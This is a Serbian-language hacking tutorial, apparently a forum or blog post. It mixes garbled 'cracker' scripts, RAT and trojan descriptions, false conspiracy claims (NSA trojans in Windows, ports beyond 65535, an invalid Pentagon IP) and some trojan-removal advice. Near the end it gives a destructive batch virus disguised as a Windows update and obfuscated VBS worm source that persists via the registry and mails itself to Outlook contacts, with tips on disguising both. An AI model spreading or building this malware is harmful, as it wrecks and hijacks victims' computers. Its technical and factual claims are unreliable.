” Svaki pocetnik je Lamer koji ce vremenom zapoceti rad svojim
stavom strucnosti hacker-a.Ta vestina ce se vremenom razviti
u programski jezik zatim ces stav primeniti
u prikaz i resavanje problema
koji su drugi propustili i postaces cracker.

” Kreiraj program tako sto ces bez dodatka necijeg stvoriti
programski put do pronalazenja propusta.Dosao sam do ideje
da jedan od tih programa prikazem,rad nije tezak ukoliko
se koncentracija sprovede u delo inteligencije.
Cracker-ski program koji cu vam prikazati sastoji se od :
rada u NOTEPAD vama je potrebno samo upisati sledece

SCRATCH INSTALLER WORK IN WINDOWS EXPLORER…
PLEASE WAIT…
c:windowsautoaccess.exe
c:windowsmicrosoftexplorer.http
?:windowsmicrosoftinternetopcions.exe
?:windowsinternetexplorerrun|del c:windows
c:windows|connections
START INSTALLATION … FROM SETUP UDATER…
C:WINDOWSSYSTEMRUNDLL.INI user.exe,windowscr4c|<3r
cr3473d;|u*1|1u5.exe cr4ck3r=cr4ck3r ins | .irc

Zatim ces ovaj program nazvati Scratch.ins i kliknuti save
rezultat koji sam dodao iz NOTEPAD programa
prikazace se ikonicom - zemlja na kojoj
je cursor - .Klikom na ikonicu videces savrsen rezultat
i zvuk bipa istalacije koji ce vas pitati dal zelite
da pokrenete instalaciju.Program koji ces videti je ustvari komanda
za pronalazenje propusta i ulazak u sam Google .
Sve sto vam je potrebno nalazi se u jacinu VERE vase
inteligencije. Shvati da se fajl nalazi u sam windows , to su
ins , ini , bin , exe , dll , prx , sys , tsp i jos mnogo drugih
fajlova za vas kreirani program …

” Ukoliko zelite da programirate WINDOWS XP
za vasu Licnu Cracker komandu , u Notepad
upisite ili iskopirajte direkno ovaj donji TEKST :

c:command prompt… Please Wait…
@ECHO SETUP
Linux@Windows
@cwindowsregistryeditormicrosoftwindowsopenForALLUSER
@c:windowsautoexec.exe
@c:windowsrun.exe
@c:windowsdllexeinsbatinitmptxtprx
@c:windowsproject.exe
@c:windowsmicrosoft.setup
Setup is DONE…
C:WINDOWSSYSTEM32setup.exe alluser.exe,microsoftwindows

Zatim ces gornji tekst koji si ubacio u Notepad nazvati
Cracker.bat i klikni na zapamti odnosno save…

” Veruj jacini inteligencije, i imaces znanje cracker-a “

A naj zanimljivije je kod nekih RAT-ova ( ovo se odnosi samo kada je instaliran na nekom racunaru sto ima dobru konekciju) koji ne samo da poseduju DOS visible Remoute vec poseduje Video rendering potprograme I tako da se vas desktop I vase aktivnosti mogu gledati I Video I Sound u real time.( kompletan vas GUI)Sto znaci da haker ima na monitoru vasu sliku monitora-kompa ,virtual tastature I svih aktivnosti za Install, run I DEL I svega ostalog. Jedino nemoze da umesto vas ubaci DVD disk kako bi gledao film ….Hahhaha

COOOOOLLL zar ne . To se zove Surveillance. Moze da vam blokira ceo kompjuter I da vam neda da pipnete misa.Kompletna kontrola….e zamislite kompletna.Ne pomaze vam ni sok reset..samo da iscupate kabal iz zida…ali naravno to pravi Hakeri nece nikada uraditi tako naglo u napad.Jer ako ste napadnuti RAT-om to znaci da imate neke informacije nekome od koristi I da ce druga strana uraditi sve da dodje do njih a da vi to ne primetite.

Zatim poseduje u sebi I citace (Mocni Readeri).Tako kada instalirate Trojana ili RAT sa ovom funkcijom …ocita se cela vasa mreza…I stanje kompjutera.Koji vam je provajder, gde se nalazite, ulica I broj, stanje na racunu,Traceroot-Whois funkcija, koji su vam otvoreni portovi , koji tip OS, koja mreza, koja IP adresa, MAC Adresa vaseg mreznog uredjaja sta je instalirano na vasem racunaru, procita ceo hard disk sa direktorijumima I fajlovima sa svim lokacijama I posalje ih brzinom u txt formatu radi analize Hakeru sta ce da ukrade od svega toga. Eto vidite sami…pa da je samo ova funkcija aktivna koja se moze smestiti u skriptu od nekoliko KB pa je mnogo..Za tili cas Haker sazna sve pojedinosti o vama a kasnije moze I preko Telnet sesije da vam pristupi kad zna sve informacije o Udaljenom kompjuteru i mrezi.

Dakle mali osiromaseni programcic sa svega nekoliko funkcija ( tipa; Ukradi I Bezi ) naziva se Trojan , a budzevina koja moze sve I svasta je RAT (Remote Administration Tools)

Postoje dve vrste ovih dveju alatki: Klijent (koji udje , obavi posao i izbrise se) i Server (koji non-stop radi u pozadini kao spyware i salje informacije Hakeru)

Evo malo da vas uplasim:

Neznam da li ste znali da je sve do Windows 3.1 bio cist OS, u sve ostale verzije je Americko Ministarstvo odbrane I National Security Agency inplementiralo nekoliko RAT-ova koji su duboko skriveni u Windowsu kodu I koji sluze za prikupljanje informacija.

Bill Gates zna za to I svi celni ljudi, ali sta mogu da rade..Da kazu njima NE…hahahahh .Ma ajte molim vas.Sve je to Tajna Masonska Igra za Globalizaciju.

Pronadjite sledeci file u Windowsu (ADVAPI32.DLL) otvorite ga u Notpedu i pogledaj te sami sta se tu nalazi ! Hahhahaaha NSA SYSKEY

Zamisli te koliko su oni inteligentni. Napravili OS koji koriste 94% posto populacije a mogu da pristupe lako svakom kompjuteru.Koliko su nam dobra doneli toliko I odneli.Globalna prismotra na legalan nacin.Cooolll. To se zove –upoznaj dobro protivnika I zavedi kolonijalizaciju( cisti neonacisti)…Kako prenose mediji koji su ih provalili….morace sve velike americke kompanije za proizvodnju software da inplementiraju NSA-RAT-ove u svoje pakete..Uff …Sledeci elektronski rat ce Amerika da dobije za 30 dana kad onesposobi sve…Jebote kad pomislis da svaki komp ima IE i Winamp…pa mogu da ugase sve za tren..Pukose aerodromi,el.stanice,poste,saobracaj,bolnice…..zajebano ljudi,i to bas

Poznato je da svaki racunar poseduje 65535 portova.Toliko mi izucavamo u skolama I toliko Firewall cuva. A sta je sa ostatkom do 100000. Tajna.Velika Tajna sinak.Moj vam je savet da predjete malo na Linux koji je open source I nije toliko laznjak. Mada, uvek ima ono ali. Oni mesaju prste gde stignu. Probaj te Novell verziju SuSE Linux 10.0 za klijenta i Free BSD Linux za servr - ufff mnogo su dobari.

Svi znamo da je uveden standard za Limit IP adresa kao npr. (255.255.255.255)—-aa ali samo za nas obicne smrtnike i poznate mreze i mrezne uredjaje.A recite mi zasto onda Pentagon ima ovu adresu 316.259.412.25—-sta, zar za njih ne vazi standard a? Joj da mi je znati njiov IP rang ( od - do ).

JOS NESTO STO JE NAJ STRASNIJE OD SVEGA: Znate li da ce u skoroj buducnosti na svakoj Maticnoj ploci ( a mozada i na drugim mestima Hard Disku npr.)biti ugradjen jedan Wireless cip,samo ne onaj sto se normalno predvidja za bezicnu komunikaciju 802.11 sa uredjajima nego specijalan za satelitsku komunikaciju.Koji je danas postao toliko jeftin da Amerika finansira i vrsi pritisak na sve proizvodjace da sto pre pocnu za radikalnom promenom hardware. Kazu Tajni izvori da ce ga inplementirati i u Procesore Intela i AMD ako vec nisu (jer ko kupi komp sigurica je da ce morati jedno od ova dva monopolista da uzme.I eto zamke.A nama pricaju dvostruko jezgro ( double core ) aaa jes .malo sutra .Jedan core i jedan Satelitski cip…Ti majusni wireless satelite cipovi su isti oni koji se koriste u sistemu Iridium ( Motorolina verzija satelitskog telefona) ,pa ako su ga smestili u telefon koji je ko kutija sibice ( samo mu je velika baterija) i sa njim komuniciras iz bilo kog kraja sveta….pa sta ce onada da rade kad to stave na plocu koja ima stalno napajanje.Sa tim mogu citati hard diskove i Kompjutere kao bukvar a da nisu prikljuceni na mrezu.Imaju pokrivenu egzosveru Satelitima, Sistemom Iridijum,pa zatim Echelon Project,pa GPS ma daj…da ne nabrajam vise…….Svasta….., ja da gledam u sobi film a meni neko satelitski (bezicno) da iscitava Hard..e nece moci . jebacu ga lose !

Jos neka rec o tom ko je National Security Agency I sta je ECHELON PROJECT:

U Fort George Meadeu sjediste je americke najtajnije i

najkontraverznije spijunske agencije NSA

(National Security Agency). www.nsa.gov

Na podrucju od 11 hektara, u zgradama bez

prozora, radi 35.000 ljudi. NSA ima budzet od cak 4,3 milijarde $ ,

vise od CIA. To vam je ono Dejms Bond odeljenje sa najsavrsenijom tehnologijom na svetu.

Gde rade najveci svetski umovi za elektroniku,programiranje ,matematiku,fiziku,kriptografiju.i td.

Echelon project America’s Secret Global Surveillance Net System

Milion poruka svakog minuta prodje kroz

kompjutere NSA (pa cak i ovaj tekst…i vjeruj te mi NEKO zna da vi

sad citate ovaj dokumenat…). Rijec je o sistemu za pracenje

telekomunikacije “Echelon”.

“Echelon” skenira svaku poruku, i ukoliko naidje na rijeci tipa

NSA, FBI, CIA, President, White House, Bomb, Bin Laden, Allah, Iraq … itd,

ta se poruka izdvaja, i salje na analizu, gdje se odredjuje njen

znacaj.

Osim sto “Echelon” prepoznaje rijeci na engleskom, prepoznaje ih i na

SVIM ostalim jezicima svijeta.

Echelon je bio super tajni projekat jos od hladnog rata, s tim da je

pojacan unazad 10 godina i to spijunskim stanicama, bazama na svim

kontinentima, a najveci prislusni centri se nalaze u:

Velikoj Britaniji, Kanadi, Australiji i Novom Zelandu, koji su

sposobni analizirati svaki telefonski poziv, fax, telex, e-mail i

drugu razmjenu informacija preko satelita ili Interneta.

U engleskom Mentwith Hillu postavljeno je 25 satelitskih antena, koje

su (vec 50 godina) deo globalnog spijunskog sistema “Echelon”, a istim

u vojnoj bazi upravlja i za isti se brine 1500 amerikanaca i 1500

britanaca (iskoristavam priliku da pozdravim ove momke, stvarno rade

tezak posao…prisluskivanje SVE tel. poziva, maila itd.),

koji 24 sata dnevno upravljaju kompjuterima i drugim sofisticiranim

uredjajima za prisluskivanje.

Navedeni sistem Echelon navodno je sluzbeno u vlasnistvu RAF-a

(britanskog kraljevskog vazduhoplovstva), ali u stvari je pod kontrolom

americke National Security Agency - NSA (A.K.A. “No Such Agency”).

Agencija pribavlja 85% svih obavjestajnih podataka u SAD-u, a i druge

zemlje u svijetu imaju ovaj procenat prikupljanja podataka tehnickim

sredstvima.

Tokom jedne istrage koja je mjesec dana, nakon sto su intervjuirani

razliciti strucnjaci, i prije svega bivsi americki tajni agenti, koji

su izasli iz sluzbe prosvjedujuci zbog zloupotrebe globalnih el.

sistema prisluskivanja, otkriveni su razliciti nacini na koje je

Italija prisluskivana sa satelita i drugih prislusnih centara

Echelona.

Istovremeno, San Vito kraj Brindisija u Italiji, godinama je bio

glavna tacka Echelonove spijunaze na Mediteranu, a trenutno je u fazi

rasformiranja. Ipak, jos djeluje kao baza potpore posebnim jedinicama

SAD za kontrolu Balkana.

Navodno, osim u vojne svrhe, pomenuti “anglosaksonski” projekat

“Echelon” se sve vise, odnosno prvenstveno koristi za ekonomske

spijunaze tj. za poboljsanje situacije americkih preduzeca, nasuprot

evropskih i azijskih, na sto ukazuju i mnogi izvjestaji, rasprave i

svjedocenja u Evopskom parlamentu.

Biljezimo primjer prisluskivanja razgovora izmedju francuskog

proizvodjaca radarske opreme “Thomson-CFS” i brazilskih vlasti 1994.

godine u vezi prodaje radarskih sistema “Sivam” vrijednog 1,3

milijarde dolara namjenjenog Amazoniji u Brazilu (u razgovori su

otkrivene visine provizija koje su se trebale platiti nekim ministrima

pri cemu je Clinton navodno dobivsi informaciju o navedenom,

obavjestio US korporaciju “Raytheon” koja je povezana sa “Echelonom”,

da bi dali bolju ponudu i dobili ugovor).

[Ulazimo u pricu…]

Potpuno je pogresno trojance zvati virusima, zato sto su oni kompletne aplikacije i ne sire se kao virusi. Takodje, trojanski konji se mogu ukloniti brisanjem njihovog fajla iz odredjenog direktorijuma, za razliku od virusa koji su obicno zakaceni za druge datoteke i ubacuju se u memoriju. Vecina njih nije sama po sebi destruktivna, ali zato omogucuje bilo kome na Internetu da upravlja vasim kompjuterom ili mu salje vase lozinke itd., tako da to kolika ce nam steta biti naneta zavisi samo od onoga ko se domogao nasih podataka. Kod trojanaca treba napraviti razliku izmedju KLIJENTA i SERVERA. Server je sam trojanac, dok je klijent program pomocu koga se njime upravlja.

Najpoznatiji trojanac je svakako Back Orifice (BO), koga je za samo mesec dana preuzelo i koristilo skoro 100000 ljudi na Internetu. On izgleda kao obicna klijent-server aplikacija za rad na udaljenom racunaru sa izuzetkom sto se server, tj. sam trojanac, instalira bez pitanja, kao virus, kada startujete zaracenu aplikaciju i omogucava svakome ko dodje do vaseg IP broja da preuzme potpunu kontrolu nad vasim racunarom dok ste na Internetu. Posle BO-a zavladala je prava pomama za slicnim programima, pa je izasao i veliki broj njegovih naslednika medju kojima su najpoznatiji NetBus, Millenium itd. Medjutim, i domaci provajderi su resili da tome stanu na put. Vecina je zatvorila port 31337 (na koji je BO najcesce konfigurisan), a otvorene su i e-mail adrese preko kojih se moze prijaviti zloupotreba korisnickog naloga (one su najcesce tipa abuse@provajder npr. abuse@eunet.yu, abuse@beotel.net itd.). Neki dobavljaci koriscenje trojanaca sankcionisu izbacivanjem, dok drugi samo upozoravaju zlonamernike.

Mnogi kada cuju rec trojanac pomisle na programe tipa NetBus-a za nedozvoljenu kontrolu racunara preko Interneta. Da to nije uvijek tako evo liste malo “drugacijih”:

“Nuke Master” - proizvoljno brise fajlove na disku;
“Cable Accelerator” - predstavlja se kao program za ubrzanje rada modema, a, u stvari, reboot-uje kompjuter svakih deset minuta;
“Happy993 - menja fajl wsock32.dll da bi mogao da zakaci sebe za svaku poruku koju saljete elektronskom postom ili u diskusione grupe.;
“Master’s paradise” - jedna od njegovih verzija otvara FTP server na zarazenom racunaru sto svima omogucava slobodan pristup njegovim fajlovima;
“The 1-900 Trojan” - posebno je zanimljiv zato sto tajno poziva neki od telefonskih brojeva koji pocinju na 1-900 u Americi, koji su namerno izabrani da svaki poziv naplacuju najmanje 4 USD u SAD (mozete zamisliti koliko bi to kostalo kod nas);
“Picture” - pretrazuje nas kompjuter u potrazi za PWL fajlovima (onim u kojima se cuvaju korisnicka imena i sifre) i salje ih na e-mail adresu u Kini;
“Satanz backdoor” - kada startujemo njegovu datoteku po imenu WinVM32.exe pojavljuje se prozorcic sa obavjestenjem o navodnoj gresci u mreznoj komunikaciji i trazi da upisete korisnicko ime i sifru koji se, nakon toga, salju na odredjeni e-mail (prozor se inace ne moze zatvoriti pomocu komande CTRL+ALT+DEL);
“HDFill” - puni hard disk raznim fajlovima dok se ne srusi;
“ProMail” - izgleda kao besplatan mail klijent a, u stvari, salje vase sifre napadacu; Pored ovih, postoji jos i desetine i desetine kopija NetBus-a i BO, zatim nekoliko bezopasnih (npr. “Mouse Joke” koji nasumicno pomjera kursor misa po ekranu) i slicnih nabrojanim.

[Kako se zastititi od trojanaca?]

Kao prvo, najvaznije je koristiti dobar antivirus. Preporucuje se AntiViral Toolkit Pro (skraceno AVP) / 1 / koji se moze preuzeti sa adrese http://www.avp.com (velicine je oko 4.2 MB). Nakon sto ga instaliramo startujemo deo po imenu “AVP monitor”, koji ce biti rezidentan i stalno ce nas stititi. Kvalitetni antivirusi (AV) su jos i Norton Antivirus (http://www.symantec.com), F-Prot (potpuno besplatan DOS program, http://www.datafellows.com/gallery/) i dr. Zatim, treba biti oprezan sa datotekama koje preuzimamo sa Interneta i diskusionih grupa (nedavno se desilo da je na jednoj od konferencija sa yu. prefiksom ostavljena datoteka zarazena trojancem “Kuang”, jednim od mnogih ‘password stealer’-a namijenjenih za kradju Internet sifara) i svaku pre startovanja skenirati nekim od pomenutih AV programa. Dobro bi bilo imati i neki cisto anti-trojan program (kao na primer “The Cleaner” koji u svojoj bazi ima oko 120 trojanaca, a moze se preuzeti sa http://www.dynamsol.com/moosoft/) ali on i nije toliko neophodan, ukoliko smo postupili po prethodnim pravilima. Takodje, nemojmo nikada preuzimati trojanske konje da bi sa njima eksperimentisali, jer su skoro svi oni zarazeni sopstvenim serverom.

[Kako kontrolisati trojana koga imate na sistemu?]

Kako kontrolisati trojanca kojeg imate na sistemu? Kako na jednostavan nacin ukloniti trojanca koji se samo startuje iz Registry baze? Ne dozvolite da Vas drugi iskoriscavaju.

Koristite program TFAK - jednostavno. Ovaj program je prvenstveno napisan da bi pomogao uklanjanje i/li kontrolu trojanaca. Kada se program prvi put startuje, on zapamti stanja u AUTOEXEC.BAT, CONFIG.SYS, WIN.INI, SYSTEM.INI, STARTUP direktorijumu, WINSTART.BAT, WININIT.INI i Registry bazi. Kada se nesto promeni u ovim fajlovima, prilikom sledeceg startovanja programa, bice prijavljeno da je doslo do promene u tom sistemskom fajlu. Registry bazu je sada daleko lakse pregledati, jer Vas program direktno uputi u sekciju koja je vezana za taj sistemski fajl pa ne morate da kopate po racunaru gde se sta nalazi. Npr. vise nije potrebno “kopati” po Registry bazi da bi dosli do kljuca:
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run.
Sada je dovoljno pozvati iz padajuceg menija Registry 1 i imacete kao na dlanu prikaz Registry kljuca
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion Run
i
HKEY_LOCAL_MACHINE Software Microsoft Windows CurrentVersion RunServices
ili Registry 2 i bice Vam prikazani sledeci kljucevi:
HKEY_CLASSES_ROOT exefile shell open command
i
HKEY_CLASSES_ROOT comfile shell open command.
To su svi kljucevi za koje se kace svi standardni trojanci. Odatle sada mozete lako i da uklonite neki red iz Registry baze. Ovaj program je trojan remover. Trenutno u svojoj bazi ima podatke o 481 trojancu (backdoor i PSW) i 25 klijentskih backdoor funkcija, koje uspesno otkriva i uklanja ili Vam dozvoljava da ih kontrolisete. TFAK moze i da posluzi kao Domain Scanner i Trojan Scanner, tj. da skenira sve portove na Internetu i da trazi sve trojance koji salju neke podatke na Internet. Tu mozete da vidite koji trojanci su jos uvek u “opticaju”. Potrebno je samo da u programu navedete raspon IP adresa koje zelite da skenirate ili tacno odredenu IP adresu koju zelite da skenirate.

Detect and remove trojans je skener koji detektuje da li na svom racunaru imate nekog trojanca. Za sada baza moze da detektuje 506 trojanaca. Nije ni puno, a nije ni malo. Port check je opcija kojom mozete da skenirate sve portove koje koristi Vas racunar u potrazi za trojancem. Veoma lako mozete da otkrijete trojanca i da vidite koji on port koristi. Uz pomoc ovog programa mozete uvek da vidite koji su programi trenutno ucitani i da, ako je potrebno, neki “ubijete”, tj. da ga obrisete iz memorije. To je omoguceno opcijom What is running ?.

What is autostarted je alatka koja omogucava laksi pregled sistemskih fajlova i mozete jako lako da vidite neku neispravnost koju je uneo neki trojanac. S ovom alatkom treba biti pazljiv jer nestrucnim rukovanjem mozete cak i da onesposobite svoj sistem a onda niste nista uradili. Kako kontrolisati trojanca kojeg imate na Vasem racunaru? Ovaj program, nudi opciju da mozete da kontrolisete neke trojance i da eventualno Vi kontrolisete mediatora. TFAK nudi opciju da kontrolisete sledece trojance: Backdoor 2.03, Blada Runner 0.8, Coma 1.09, Devil, Doly Trojan 1.7, Exploiter, Frenzy 2000, GateCrasher, Host Control, InCommand 1.0, INI Killer, Kaos, NetBus 2.1, OOLT, Phase Zero 1.0, Robo Hack 1.2, Satan’s Back Door, Secret Service, Spying King, Sub7 2.0, SysMon, TerrorTrojan, UMuerte, Vampire 1.2, WarTrojan 2 i WinCrash 2.0. Ovu opcija je za malo naprednije korisnike. Autor programa je SnakeByte, koji je clan nemacke Kryptocrew ekipe koja se bavi sigurnoscu korisnika. Ovaj program je besplatan za ne komercijalno koriscenje. Svaka njegova zloupotreba je kaznjiva.

——————————————————————————–

Napad Trojancem I RAT-om! ————best off

——————————————————————————–

Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo I samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.
[Ulazimo u pricu…]
Zapravo najlakse je da nekoga napadnete i istrazite pomocu tako dobrih Trojanaca I RAT-ova !

Kao sto smo vec saznali da postoje mnogo trojanaca sa razlicitim delovanjem.Ali ja bih istakao trojanca koji ima sve obuhvatnu ulogu u racunaru.Da je mali I skriva se kao Trojan a deluje kao mocni RAT (Remote Administration Tool). Iako ce znaciti da ce biti malo veci (200kb I vise) ali ce vam sluziti kao najbolje oruzije.Teze ga je proslediti I naterati zrtvu da ga pokrene ali vi morate imati maste u kreiranju zamke ako vec hocete da se bavite ovim. Uf sad sam ga bas upetljao……O.K. –da krenemo sa objasnjenjima.

Zapravo sta je to RAT (Remote Administration Tool): to su vam naj naj mocnije alatke a pritom I najopasnije u ovom poslu…Prave ga Uber Hakeri a koriste svi….

To su vam dragi moji kompletni hakerski NET programi ( ma skoro citav operativni pod system)koji sadrze u sebi skoro sve zezalice (ali o tome ce mo kasnije), kompatabilni su za sve mreze I protokole ili za one za koje se kreiraju, sadrze u svom kodu instrukcije (potprograme)koje KOMPLETNO PREUZIMAJU KONTROLU NAD UDALJENIM RACUNAROM.Sto znaci da ako ste zarazeni sa RAT-om … najebali ste (najblaze receno).

Jedina mana je sto su malo veci ( mogu biti od nekoliko kb pa sve I preko 100mb-pa kako i nece kad ima toliko potprograma) pa ih je teze distribuirati na udaljeni komp ali oni se cesto kriju u velikim instalacijama I krekovima( npr. Downlodujete Corel, Photoshop, AutoCad, film, muziku, krek u kojima su najcesce I td.. sa sumljivih lokacija ili sa Peer to Peer mreza (e-Mule-npr, BitTorrent, DCC)

RAT sadrzi skoro sve da paralise vas racunar I prisvoji ga.Zapravo sta se nalazi u njemu: I treojanci I virusi I crvi I exploiti I keylogeri I snifferi I blokeri za pojedine programe ma skoro sve ….bar ja ih znam hiljadu dobrih….ali necu vam reci ime naravno…jer je to skroz nehumano.

Nemoj te se ponadati da ste spaseni jer se dobro skriva I Antivirus ga nevidi kao ni Fireweall….stalno izlaze nove modifikacije tako da ostaju Stellth.( setite se predhodne price o AntiVirus tehnologiji od 6 meseci kasnjenja.

RAT vam deluje kao kasetna bomba.Kada se instalira izbaci gomilu svojih potprograma ,kodova , skripti I rasiri se na sve sisteme Windowsa brzinom svetlosti I preuzima kontrolu.Ali naravno neprimetno da vi nebiste odmah izvrsili Format C:> jer vam je to jedino resenje da ga onesposobite za vecinu funkcija iako je rezistentan u ROM memoriji vaseg hardware.Zapravo RAT je savrsenstvo Cyber napada…To je prava umetnost programiranja ,dugo se pravi I dosta kosta.Nemoj te se ponadati da na netu lamerski skidate vec vidjene RAT programe I da sa tim postignete neke znacajnije uspehe.Svasta ,pa I sami znate da ako je nesto izaslo kako javno za to je vec napravljena dobra zastita.Prave se stvari razmenjuju na tajnim kanalima IRC I VPN (Virtual Private Network—PGP )dobro kriptovano I osigurano od kradja I samo medju malobrojnim Hakerskim Grupama I Vladinim organizacijama.

Delovanje:( objasnicu primer ako poseduje skoro sve alatke)

Kada udje u racunar prvo se dobro skrije pod odredjenim imenima u fajlovimai registry bazi ,npr. Sound.dll, Kernel32, inplementira se uz Windowsove programe ,registry ne vidljiv startup,preuzima procese, aktivira blokere za AntiVirus I Firewall I necujno preuzima njihovu kontrolu. Zatim aktivira snifere I exploite za skeniranje mreze I aktivnosti na racunaru I preuzima svu ulogu nad njome. Ako je inplementiran Trojan onda krade zadate fajlove I sifre I salje ih na zadatu adresu ,Instalira crva za pracenje mail box I I ostalih aktivnosti za koje je projektovan. Aktivira Keylogere-spyware I prati vam kompletne aktivnosti na racunaru , sta kucate na tastaturi I sta pokrecete od programa , kuda surfujete I td.

Ovo je zanimljivo u vezi tastature: Malo da pojasnim jebiga…Sigurno ste culi za keylogere I spyware koje su komercijalni I cesto koriste Sefovi u firmama za spijuniranje radnika sta rade na kompu a koriste ga cesto I roditelji da bi videli sta deca posecuju od sajtova,koje teme ih interesuju ,koje su im sifre I td.)Istaci cu jedan samo- Spector Pro v5.0..a zamisli te onda trojanca koji vam prati bafer tastature I prosledjuje u txt formatu gazdi na drugoj strani. Mozete zamisliti da ste kucali pismo devojci ili vasu hotmail adresu u Messengeru npr. pera@hotmail.com naravno zatim odmah kucate I ********** ali u vidljivom stanju.Pripazite se .mozda vam neko cita mail ! Ok.Toliko o tome—vrati mo se RAT-u>

Sta su virusi?

Na pocetku tutoriala cu vam objasniti sta su virusi, iako je vecina mozda i okusila nevolje koje virus donosi. Virus je zapravo program ili skripta (java, vbasic…) napravljena da nasteti vasem kompjuteru i koji se moze sam i bez vaseg znanja kopirati na floppy i slati preko e-maila koristeci vase mail adrese u Address Book-u (to su takozvani CRVI ili WORM). Pored toga neki virusi su napravljeni tako da zaraze i ostale fajlove na vasem kompjuteru.

[Kako se prave?]

Za pravljenje virusa mogu se koristiti svi moguci programski i skripting jezici. Da bi ste vi sami mogli da pravite neke vrste virusa morate da znate odredjene programske jezike. Zato vam savetujem da, ukoliko neznate, naucite neki programski jezik. Ukoliko zelite da postanete haker morate znati c, c++,java,skripts i perl programske jezike.

U daljem tekstu slede 2 primera *.BAT virusa i *.TXT.VBS virusa koje je veoma jednostavno napraviti i koji ce vam malo pribliziti pojam pravljenja virusa! Naravno, da bi ih razumeli morate znati BATCH i VISUAL BASIC skripting jezike.

Ukoliko bi vi zeleli da napravite *.bat virus, evo vam malog primera kako da to uradite. Potrebno je samo da sledeci batch kod iskopirate u notepad i snimite ga kao winupdt.bat fajl i eto vam malog virusa! Ovaj virus se predstavlja kao UPDATE za Windows , ali je zapravo virus koji ce obrisati vazne sistemske fajlove, kao i Windows Explorer i zatim restartovati racunar. Jednom napravljen ovakav virus mozete ubaciti i u neki fajl kao kamuflazu (program,igricu,txt,sliku,mp3 itd.), a to ce vam najlakse biti uz pomoc nekog Droppera i Binder-Joiner (npr. MultiBinder), sem ukoliko znate c/c++ programski jezik… HeHeHe Very Happy (da bi naucili ovaj programski jezik downloadujte tutorial sa naseg sajta, ili potrazite neki na NETu).

######### SECI OVDE #########

@ECHO OFF
echo Welcome To Microsoft Windows System Updater Setup
echo Installing Components… Please Wait…
echo y|del c:autoexec.bat
echo y|del c:config.sys
echo y|del c:windowssystem.ini
echo y|del c:windowswin.ini
echo y|del c:windowsexplorer.exe
echo Installing is DONE.
echo Setup Will Now restart Your Computer… Please Wait…
start C:WINDOWSsystem32RUNDLL.EXE user.exe,exitwindows

######### SECI OVDE #########

VBA crvi koriste posebnu tehniku kako bi zavarali potencijalnu zrtvu. Pored toga sto crv nema ekstenziju EXE vec VBA ili VBS (sto znaci da su pisani u Visual Basic Script formatu i da je za njihovo izvrsavanje potreban IE), takvi crvi se obicno distribuiraju sa extenzijom ‘.txt.vba’, tako da potencijalna zrtva pomisli da se radi o obicnom tekstu i startuju fajl. Posto je zadnja ekstenzija ‘.vba’, ne startuje se Notepad vec IE koji izvrsi program, tako da potencijalna zrtva postane prava zrtva.

Sledeci virus je srpska verzija virusa I_LOVE_YOU, samo sto je mnogo opasniji i mnogo bolji. Ovaj kod ce te takodje iskopirati u notepad, ali snimicete ga kao volim_te.txt.vbs Virus je odlican, sam se kopira i salje putem e-maila ili preko mIRC-a.

######### SECI OVDE #########

‘Virus volim_te.txt.vbs Created By VokySoft. 11/2/2002
Set HFFLUN1U = createobject(”scripting.filesystemobject”)
HQO5518H = HFFLUN1U.getspecialfolder(1)
R125B3VC = HQO5518H & “volim_te.txt.vbs”
Set SO2ERHGU = createobject(”wscript.shell”)
SO2ERHGU.regwrite “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate”, “wscript.exe ” & R125B3VC & ” %”
HFFLUN1U.copyfile wscript.scriptfullname, R125B3VC
O8UN6TKP
If SO2ERHGU.regread(”HKLMSOFTWAREMicrosoftWindowsCurrentVersionvolim_te.txt.vbsP6OIH9283) <> 1 then
EU3V0765
End if
If SO2ERHGU.regread(”HKLMSOFTWAREMicrosoftWindowsCurrentVersionvolim_te.txt.vbsT7UT85823) <> 1 then
EJSL7CBE “”
End if

Set M79N43AH= HFFLUN1U.opentextfile(wscript.scriptfullname)
IC4FESF6 = M79N43AH.readall
M79N43AH.close
Do
if not(HFFLUN1U.fileexists(wscript.scriptfullname)) then
set I1JH1J72= HFFLUN1U.createtextfile(wscript.scriptfullname)
I1JH1J72.write IC4FESF6
I1JH1J72.close
end if
UDT5953N = SO2ERHGU.regread(”HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate”)
If UDT5953N <> “wscript.exe ” & R125B3VC & ” %” then
SO2ERHGU.regwrite “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWinUpdate”, “wscript.exe ” & R125B3VC & ” %”
end if
UDT5953N= “”
loop
Function EU3V0765()
Set GJ7P4911 = CreateObject(”Outlook.Application”)
If GJ7P4911 = “Outlook” Then
Set KECO30GA = GJ7P4911.GetNameSpace(”MAPI”)
Set L219C6V2 = KECO30GA.AddressLists
For Each H82H7563 In L219C6V2
If H82H7563.AddressEntries.Count <> 0 Then
A5II2553 = H82H7563.AddressEntries.Count
For S8JO7233 = 1 To A5II2553
Set K7623MOJ = GJ7P4911.CreateItem(0)
Set H541TU1Q = H82H7563.AddressEntries(S8JO7233)
K7623MOJ.To = H541TU1Q.Address
K7623MOJ.Subject = “cao”
K7623MOJ.Body = “Cao, ” & vbcrlf & “nadam se da ces ovo procitati i” & vbcrlf & “da ces razumeti…” & vbcrlf & “”
execute “set ISHK15M5 =K7623MOJ.” & Chr(65) & Chr(116) & Chr(116) & Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115)
UVSBA4Q2 = R125B3VC
K7623MOJ.DeleteAfterSubmit = True
ISHK15M5.Add UVSBA4Q2
If K7623MOJ.To <> “” Then
K7623MOJ.Send
End If
Next
End If
Next
End If
End function
Function EJSL7CBE(N46SM3R1)
If N46SM3R1 <> “” Then
RH5KFA0D = SO2ERHGU.regread(”HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir”)
If HFFLUN1U.fileexists(”c:mircmirc.ini”) Then
N46SM3R1 = “c:mirc”
ElseIf HFFLUN1U.fileexists(”c:mirc32mirc.ini”) Then
N46SM3R1 = “c:mirc323
ElseIf HFFLUN1U.fileexists(RH5KFA0D & “mircmirc.ini”) Then
N46SM3R1 = RH5KFA0D & “mirc”
ElseIf HFFLUN1U.fileexists(RH5KFA0D & “mirc32mirc.ini”) Then
